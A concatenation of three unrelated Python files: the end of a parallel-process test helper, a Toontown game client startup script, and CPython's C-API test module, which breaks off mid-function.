None. When timeout is specified, this function will wait at most 'timeout' seconds for the processes to
run. When time is up, this function will try to terminate or even kill all the processes.
Raises:
flag.: In case any of the spawned process cannot be terminated, fail the test.
Returns:
dict: An instance of multiprocessing.Manager().dict(). It is a proxy to the shared dict that is used by all the
spawned processes.
"""
workers = []
results = Manager().dict()
start_time = datetime.datetime.now()
for node in nodes:
kwargs['node'] = node
kwargs['results'] = results
process_name = "{}--{}".format(target.__name__, node)
worker = Process(name=process_name, target=target, args=args, kwargs=kwargs)
worker.start()
logger.debug('Started process {} running target "{}"'.format(worker.pid, process_name))
workers.append(worker)
for worker in workers:
logger.debug('Wait for process "{}" with pid "{}" to complete, timeout={}'.format(worker.name, worker.pid, timeout))
worker.join(timeout)
logger.debug('Process "{}" with pid "{}" completed'.format(worker.name, worker.pid))
# If execution time of processes exceeds timeout, need to force terminate them all.
if timeout is not None:
if (datetime.datetime.now() - start_time).seconds > timeout:
logger.error('Process execution time exceeds {} seconds.'.format(str(timeout)))
break
# check if we have any processes that failed - have exitcode non-zero
failed_processes = [worker for worker in workers if worker.exitcode != 0]
# Force terminate spawned processes
for worker in workers:
if worker.is_alive():
logger.error('Process {} with pid {} is still alive, try to force terminate it.'.format(worker.name, worker.pid))
worker.terminate()
end_time = datetime.datetime.now()
delta_time = end_time - start_time
# Some processes cannot be terminated. Try to kill them and raise flag.
running_processes = [worker for worker in workers if worker.is_alive()]
if len(running_processes) > 0:
logger.error('Found processes still running: {}. Try to kill them.'.format(str(running_processes)))
for p in running_processes:
try:
os.kill(p.pid, signal.SIGKILL)
except OSError:
pass
pt_assert(False, \
'Processes running target "{}" could not be terminated. Tried killing them. But please check'.format(target.__name__))
# if we have failed processes, we should throw an exception and fail
if len(failed_processes):
logger.error('Processes "{}" had failures. Please check the debug logs'.format(failed_processes))
pt_assert(False, 'Processes "{}" had failures. Please check the debug logs'.format(failed_processes))
logger.info('Completed running processes for target "{}" in {} seconds'.format(target.__name__, str(delta_time)))
return results
def reset_ansible_local_tmp(target):
"""Decorator for resetting ansible default local tmp dir for parallel multiprocessing.Process
Args:
target (function): The function to be decorated.
"""
def wrapper(*args, **kwargs):
# Reset the ansible default local tmp directory for the current subprocess
# Otherwise, multiple processes could share a same ansible default tmp directory and there could be conflicts
from ansible import constants
prefix = 'ansible-local-{}'.format(os.getpid())
constants.DEFAULT_LOCAL_TMP = tempfile.mkdtemp(prefix=prefix)
try:
target(*args, **kwargs)
finally:
# User of tempfile.mkdtemp need to take care of cleaning up.
shutil.rmtree(constants.DEFAULT_LOCAL_TMP)
wrapper.__name__ = target.__name__
return wrapper
|
ClientStart.py
|
#!/usr/bin/env python2
import __builtin__
__builtin__.process = 'client'
# Temporary hack patch:
__builtin__.__dict__.update(__import__('pandac.PandaModules', fromlist=['*']).__dict__)
from direct.extensions_native import HTTPChannel_extensions
from direct.extensions_native import Mat3_extensions
from direct.extensions_native import VBase3_extensions
from direct.extensions_native import VBase4_extensions
from direct.extensions_native import NodePath_extensions
from panda3d.core import loadPrcFile
if __debug__:
loadPrcFile('config/general.prc')
loadPrcFile('config/release/dev.prc')
from direct.directnotify.DirectNotifyGlobal import directNotify
from otp.settings.Settings import Settings
notify = directNotify.newCategory('ClientStart')
notify.setInfo(True)
preferencesFilename = ConfigVariableString(
'preferences-filename', 'preferences.json').getValue()
notify.info('Reading %s...' % preferencesFilename)
__builtin__.settings = Settings(preferencesFilename)
if 'fullscreen' not in settings:
settings['fullscreen'] = False
if 'music' not in settings:
settings['music'] = True
if 'sfx' not in settings:
settings['sfx'] = True
if 'musicVol' not in settings:
settings['musicVol'] = 1.0
if 'sfxVol' not in settings:
settings['sfxVol'] = 1.0
if 'loadDisplay' not in settings:
settings['loadDisplay'] = 'pandagl'
if 'toonChatSounds' not in settings:
settings['toonChatSounds'] = True
if 'newGui' not in settings:
settings['newGui'] = False
if 'show-disclaimer' not in settings:
settings['show-disclaimer'] = True
if 'fieldofview' not in settings:
settings['fieldofview'] = 52
if 'show-cog-levels' not in settings:
settings['show-cog-levels'] = True
if 'health-meter-mode' not in settings:
settings['health-meter-mode'] = 2
if 'experienceBarMode' not in settings:
settings['experienceBarMode'] = True
settings['newGui'] = False # Force this to be false
loadPrcFileData('Settings: res', 'win-size %d %d' % tuple(settings.get('res', (1280, 720))))
loadPrcFileData('Settings: fullscreen', 'fullscreen %s' % settings['fullscreen'])
loadPrcFileData('Settings: music', 'audio-music-active %s' % settings['music'])
loadPrcFileData('Settings: sfx', 'audio-sfx-active %s' % settings['sfx'])
loadPrcFileData('Settings: musicVol', 'audio-master-music-volume %s' % settings['musicVol'])
loadPrcFileData('Settings: sfxVol', 'audio-master-sfx-volume %s' % settings['sfxVol'])
loadPrcFileData('Settings: loadDisplay', 'load-display %s' % settings['loadDisplay'])
loadPrcFileData('Settings: toonChatSounds', 'toon-chat-sounds %s' % settings['toonChatSounds'])
'''loadDisplay = settings.get('loadDisplay', 'pandagl')
loadPrcFileData('', 'load-display' % settings['loadDisplay'])'''
import os
import time
import sys
import random
import __builtin__
try:
from toontown.launcher.TTALauncher import TTALauncher
launcher = TTALauncher()
__builtin__.launcher = launcher
except Exception as e:
raise (e)
notify.info('Starting the game...')
if launcher.isDummy():
http = HTTPClient()
else:
http = launcher.http
from toontown.toonbase import ToontownGlobals
tempLoader = Loader()
backgroundNode = tempLoader.loadSync(Filename('phase_3/models/gui/loading-background'))
from direct.gui import DirectGuiGlobals
from direct.gui.DirectGui import *
from toontown.pgui import DirectGuiGlobals as PGUIGlobals
notify.info('Setting the default font...')
DirectGuiGlobals.setDefaultFontFunc(ToontownGlobals.getInterfaceFont)
PGUIGlobals.setDefaultFontFunc(ToontownGlobals.getInterfaceFont)
launcher.setPandaErrorCode(7)
from toontown.toonbase import ToonBase
ToonBase.ToonBase()
from pandac.PandaModules import *
if base.win is None:
notify.error('Unable to open window; aborting.')
launcher.setPandaErrorCode(0)
launcher.setPandaWindowOpen()
ConfigVariableDouble('decompressor-step-time').setValue(0.01)
ConfigVariableDouble('extractor-step-time').setValue(0.01)
backgroundNodePath = aspect2d.attachNewNode(backgroundNode, 0)
backgroundNodePath.setPos(0.0, 0.0, 0.0)
backgroundNodePath.setScale(render2d, VBase3(1))
backgroundNodePath.find('**/fg').hide()
logo = OnscreenImage(
image='phase_3/maps/toontown-logo.png',
scale=(1 / (4.0/3.0), 1, 1 / (4.0/3.0)),
pos=backgroundNodePath.find('**/fg').getPos())
logo.setTransparency(TransparencyAttrib.MAlpha)
logo.setBin('fixed', 20)
logo.reparentTo(backgroundNodePath)
backgroundNodePath.find('**/bg').setBin('fixed', 10)
base.graphicsEngine.renderFrame()
DirectGuiGlobals.setDefaultRolloverSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_rollover.ogg'))
DirectGuiGlobals.setDefaultClickSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_create_toon_fwd.ogg'))
DirectGuiGlobals.setDefaultDialogGeom(loader.loadModel('phase_3/models/gui/dialog_box_gui'))
PGUIGlobals.setDefaultRolloverSound(base.loadSfx('phase_3/audio/sfx/GUI_rollover.ogg'))
PGUIGlobals.setDefaultClickSound(base.loadSfx('phase_3/audio/sfx/GUI_create_toon_fwd.ogg'))
PGUIGlobals.setDefaultDialogGeom(loader.loadModel('phase_3/models/gui/dialog_box_gui'))
from toontown.toonbase import TTLocalizer
from otp.otpbase import OTPGlobals
OTPGlobals.setDefaultProductPrefix(TTLocalizer.ProductPrefix)
#For Devs only. (The below)
'''from direct.stdpy import threading, thread
def __inject_wx(_):
code = textbox.GetValue()
exec (code, globals())
def openInjector_wx():
import wx
app = wx.App(redirect = False)
frame = wx.Frame(None, title = "TTPA Dev Injector", size=(640, 400), style=wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.MINIMIZE_BOX)
panel = wx.Panel(frame)
button = wx.Button(parent = panel, id = -1, label = "Inject", size = (50, 20), pos = (295, 0))
global textbox
textbox = wx.TextCtrl(parent = panel, id = -1, pos = (20, 22), size = (600, 340), style = wx.TE_MULTILINE)
frame.Bind(wx.EVT_BUTTON, __inject_wx, button)
frame.Show()
app.SetTopWindow(frame)
textbox.AppendText(" ")
threading.Thread(target = app.MainLoop).start()
openInjector_wx()'''
if base.musicManagerIsValid:
music = base.loader.loadMusic('phase_3/audio/bgm/tt_theme.ogg')
if music:
music.setLoop(1)
music.setVolume(0.9)
music.play()
notify.info('Loading the default GUI sounds...')
DirectGuiGlobals.setDefaultRolloverSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_rollover.ogg'))
DirectGuiGlobals.setDefaultClickSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_create_toon_fwd.ogg'))
else:
music = None
from toontown.toonbase import ToontownLoader
from direct.gui.DirectGui import *
serverVersion = base.config.GetString('server-version', 'no_version_set')
'''
Let's have these here so you can tell if dev or debug mode is enabled or not
easily.
'''
if __dev__:
serverVersionText = serverVersion + "-dev"
elif __debug__:
serverVersionText = serverVersion + "-debug"
else:
serverVersionText = serverVersion
version = OnscreenText(serverVersionText, pos=(-1.3, -0.975), scale=0.06, fg=Vec4(0, 0, 0, 1), align=TextNode.ALeft)
version.setPos(0.03,0.03)
version.reparentTo(base.a2dBottomLeft)
from toontown.suit import Suit
Suit.loadModels()
loader.beginBulkLoad('init', TTLocalizer.LoaderLabel, 138, 0, TTLocalizer.TIP_NONE, 0)
from toontown.toonbase.ToonBaseGlobal import *
from direct.showbase.MessengerGlobal import *
from toontown.distributed import ToontownClientRepository
cr = ToontownClientRepository.ToontownClientRepository(serverVersion, launcher)
cr.music = music
del music
base.initNametagGlobals()
base.cr = cr
loader.endBulkLoad('init')
from otp.friends import FriendManager
from otp.distributed.OtpDoGlobals import *
cr.generateGlobalObject(OTP_DO_ID_FRIEND_MANAGER, 'FriendManager')
if not launcher.isDummy():
base.startShow(cr, launcher.getGameServer())
else:
base.startShow(cr)
backgroundNodePath.reparentTo(hidden)
backgroundNodePath.removeNode()
del backgroundNodePath
del backgroundNode
del tempLoader
version.cleanup()
del version
base.loader = base.loader
__builtin__.loader = base.loader
autoRun = ConfigVariableBool('toontown-auto-run', 1)
if autoRun:
try:
run()
except SystemExit:
raise
except:
from toontown.toonbase import ToonPythonUtil as PythonUtil
print PythonUtil.describeException()
raise
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import _thread
import importlib.machinery
import importlib.util
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support import import_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import _testmultiphase
except ImportError:
_testmultiphase = None
# Skip this test if the _testcapi module isn't available.
_testcapi = import_helper.import_module('_testcapi')
import _testinternalcapi
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def decode_stderr(err):
return err.decode('utf-8', 'replace').replace('\r', '')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@support.requires_subprocess()
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error: '
b'PyThreadState_Get: '
b'the function must be called with the GIL held, '
b'but the GIL is released '
b'(the current Python thread state is NULL)'),
err)
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned NULL without setting an exception\n'
r'Python runtime state: initialized\n'
r'SystemError: <built-in function return_null_without_error> '
r'returned NULL without setting an exception\n'
r'\n'
r'Current thread.*:\n'
r' File .*", line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an exception')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned a result with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError\n'
r'\n'
r'The above exception was the direct cause '
r'of the following exception:\n'
r'\n'
r'SystemError: <built-in '
r'function return_result_with_error> '
r'returned a result with an exception set\n'
r'\n'
r'Current thread.*:\n'
r' File .*, line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an exception set')
def test_getitem_with_error(self):
# Test _Py_CheckSlotResult(). Raise an exception and then calls
# PyObject_GetItem(): check that the assertion catches the bug.
# PyObject_GetItem() must not be called with an exception set.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.getitem_with_error({1: 2}, 1)
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
if 'SystemError: ' not in err:
self.assertRegex(err,
r'Fatal Python error: _Py_CheckSlotResult: '
r'Slot __getitem__ of type dict succeeded '
r'with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError: bug\n'
r'\n'
r'Current thread .* \(most recent call first\):\n'
r' File .*, line 6 in <module>\n'
r'\n'
r'Extension modules: _testcapi \(total: 1\)\n')
else:
# Python built with NDEBUG macro defined:
# test _Py_CheckFunctionResult() instead.
self.assertIn('returned a result with an exception set', err)
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
lines = out.splitlines()
for i, line in enumerate(lines, 1):
self.assertIn(b'MemoryError', out)
*_, count = line.split(b' ')
count = int(count)
self.assertLessEqual(count, i*5)
self.assertGreaterEqual(count, i*5-1)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_heap_ctype_doc_and_text_signature(self):
self.assertEqual(_testcapi.HeapDocCType.__doc__, "somedoc")
self.assertEqual(_testcapi.HeapDocCType.__text_signature__, "(arg1, arg2)")
def test_null_type_doc(self):
self.assertEqual(_testcapi.NullTpDocType.__doc__, None)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_heaptype_with_buffer(self):
inst = _testcapi.HeapCTypeWithBuffer()
b = bytes(inst)
self.assertEqual(b, b"1234")
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
obj = _testcapi.HeapCTypeSetattr()
self.assertEqual(obj.pvalue, 10)
obj.value = 12
self.assertEqual(obj.pvalue, 12)
del obj.value
self.assertEqual(obj.pvalue, 0)
def test_pynumber_tobase(self):
from _testcapi import pynumber_tobase
self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
self.assertEqual(pynumber_tobase(123, 8), '0o173')
self.assertEqual(pynumber_tobase(123, 10), '123')
self.assertEqual(pynumber_tobase(123, 16), '0x7b')
self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
self.assertEqual(pynumber_tobase(-123, 10), '-123')
self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
self.assertRaises(TypeError, pynumber_tobase, '123', 10)
self.assertRaises(SystemError, pynumber_tobase, 123, 0)
def check_fatal_error(self, code, expected, not_expected=()):
with support.SuppressCrashReport():
rc, out, err = assert_python_failure('-sSI', '-c', code)
err = decode_stderr(err)
self.assertIn('Fatal Python error: test_fatal_error: MESSAGE\n',
err)
match = re.search(r'^Extension modules:(.*) \(total: ([0-9]+)\)$',
err, re.MULTILINE)
if not match:
self.fail(f"Cannot find 'Extension modules:' in {err!r}")
modules = set(match.group(1).strip().split(', '))
total = int(match.group(2))
for name in expected:
self.assertIn(name, modules)
for name in not_expected:
self.assertNotIn(name, modules)
self.assertEqual(len(modules), total)
@support.requires_subprocess()
def test_fatal_error(self):
# By default, stdlib extension modules are ignored,
# but not test modules.
expected = ('_testcapi',)
not_expected = ('sys',)
code = 'import _testcapi, sys; _testcapi.fatal_error(b"MESSAGE")'
self.check_fatal_error(code, expected, not_expected)
# Mark _testcapi as stdlib module, but not sys
expected = ('sys',)
not_expected = ('_testcapi',)
code = textwrap.dedent('''
import _testcapi, sys
sys.stdlib_module_names = frozenset({"_testcapi"})
_testcapi.fatal_error(b"MESSAGE")
''')
self.check_fatal_error(code, expected)
def test_pyobject_repr_from_null(self):
s = _testcapi.pyobject_repr_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_str_from_null(self):
s = _testcapi.pyobject_str_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_bytes_from_null(self):
s = _testcapi.pyobject_bytes_from_null()
self.assertEqual(s, b'<NULL>')
def test_Py_CompileString(self):
# Check that Py_CompileString respects the coding cookie
_compile = _testcapi.Py_CompileString
code = b"# -*- coding: latin1 -*-\nprint('\xc2\xa4')\n"
result = _compile(code)
expected = compile(code, "<string>", "exec")
self.assertEqual(result.co_consts, expected.co_consts)
def test_export_symbols(self):
# bpo-44133: Ensure that the "Py_FrozenMain" and
# "PyThread_get_thread_native_id" symbols are exported by the Python
# (directly by the binary, or via by the Python dynamic library).
ctypes = import_helper.import_module('ctypes')
names = []
# Test if the PY_HAVE_THREAD_NATIVE_ID macro is defined
if hasattr(_thread, 'get_native_id'):
